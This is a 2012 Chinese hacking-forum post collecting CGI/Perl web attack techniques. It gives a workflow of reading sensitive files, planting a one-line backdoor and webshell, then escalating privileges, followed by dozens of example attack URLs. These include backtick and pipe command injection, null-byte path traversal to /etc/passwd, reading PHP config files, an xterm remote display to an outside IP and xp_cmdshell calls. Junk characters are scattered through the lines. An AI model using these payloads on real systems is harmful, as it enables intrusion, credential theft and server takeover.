找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2641|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
! M3 U' z2 @" q: D+ S. f" zcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
% B8 x  u, Q/ d9 Q9 e" z% N感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
' i+ u- }" H6 Q- I( P* b' @8 p注“  1 W5 B$ F9 Z1 y' L3 \
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
% d: l3 F& s& g& H, k3 c7 t; V. T以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
6 M( l$ I0 Z1 T6 f* u& e5 C* a( C, E/ F0 A
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
# c9 t5 W5 M$ j- E9 p# t' Zhttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
! L) Q2 M( m1 O8 O% `( Y  }http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  0 A; m  C( e/ W' q& e- A
http://target.com/cgi-bin/home/news/sub.pl?`id`  
8 C! n! Q* R+ x3 a( s, Y3 G% Shttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  - _' E2 X' D5 l6 Z
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  
6 R5 f, K. t2 R9 Q+ a
4 t, A) H6 m( ]http://target.com/test.pl;ls|  
( D8 x* C! J- b6 h" ~http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
) s* C/ u" b: B" F# x" j" T7 K5 e$ zhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
3 {3 o2 X' j8 `9 V. \3 phttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  - \# b  X  L/ {
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  ) Z$ J) ~/ }/ ^( B$ ^
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
3 |% G: ?1 }) b9 w" r  O
0 n5 m' K4 F2 ]http://target.com/test.pl?&........ /../../etc/passwd  / g$ q; I9 n! X# j" N0 S
" F% [- N+ F) u- g  t% Y- D- f4 _
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  3 H' C/ p% W( F" r, L
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
* n8 C* f& y4 J4 N. r1 ghttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  ; A( C3 X9 ~, i4 `% k, n9 i5 _
6 [* ?6 C. F2 \5 }- ?
http://www.target.org/show.php?f ... /include/config.php 查看php代码  2 p" s9 R0 r, L$ ~  ]
http://www.target.org/show.php?f ... ng/admin/global.php  
& p2 D- Y3 r2 I: B
+ D/ R! R+ B# H0 Q; ?# {emm和ps的一句话- s, K, ?3 p8 L
. e$ k( j! |# X2 r- a) P
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  ( C' S# z, |( e- p3 I* z0 M) Y
) K; c  r) r  M$ d
>bbb%20|  & U+ X& R2 l# [# E
6 V, a- T3 ?+ o! {
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
+ X" G, V' \4 l
+ X5 f& H* q7 Ehttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  # R7 i! v0 ?' t5 g
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
0 p, b) r* y. q: @* T7 g  x  i3 ^" ^9 Y( [4 ^" I+ _" d
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
5 S! N0 k3 B# zhttp://target.com/index.html#cmd.exe  
- B% g7 v/ V4 \; ~& Y9 Qhttp://target.com/index.html?dummyparam=xp_cmdshell  , x& q  R/ d) @! l# b; z
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
' s6 ?* W2 L3 p/ N. g5 a; y6 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表